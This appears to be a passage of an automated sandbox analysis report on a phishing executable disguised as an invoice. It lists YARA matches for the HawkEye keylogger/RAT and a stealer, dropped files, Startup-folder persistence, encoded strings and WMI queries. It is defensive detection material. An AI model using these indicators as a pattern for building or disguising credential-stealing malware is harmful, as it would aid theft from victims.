                            Source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 27.2.hawkgoods.exe.31f8c9c.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 6.2.hawkgoods.exe.2a689b0.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: PO_Invoices_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            Source: I$s#$lT3ssl.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            Source: hawkgoods.exe.5.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                            Source: hawkgoods.exe.5.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                            Source: hawkgoods.exe.5.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                            Source: hawkgoods.exe.5.dr, Form1.csCryptographic APIs: 'CreateDecryptor'
                            Source: origigoods40.exe.5.dr, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                            Source: origigoods40.exe.5.dr, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                            Source: hawkgoods.exe.5.dr, Form1.csBase64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.csBase64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.csBase64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.251356418.000000000654B000.00000004.00000001.sdmpBinary or memory string: Yu Type Library is a Trademark of JIYUKOBO Ltd. registered in Japan.slnt
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.251513936.000000000654B000.00000004.00000001.sdmpBinary or memory string: n Japan.slnt
                            Source: classification engineClassification label: mal100.phis.troj.adwa.spyw.evad.winEXE@46/40@68/6
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B64E52 AdjustTokenPrivileges,
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B64E1B AdjustTokenPrivileges,
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_Invoices_pdf.exe.logJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:120:WilError_01
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_01
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5440
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3724
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_01
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awkr53h0.pdr.ps1Jump to behavior
                            Source: PO_Invoices_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
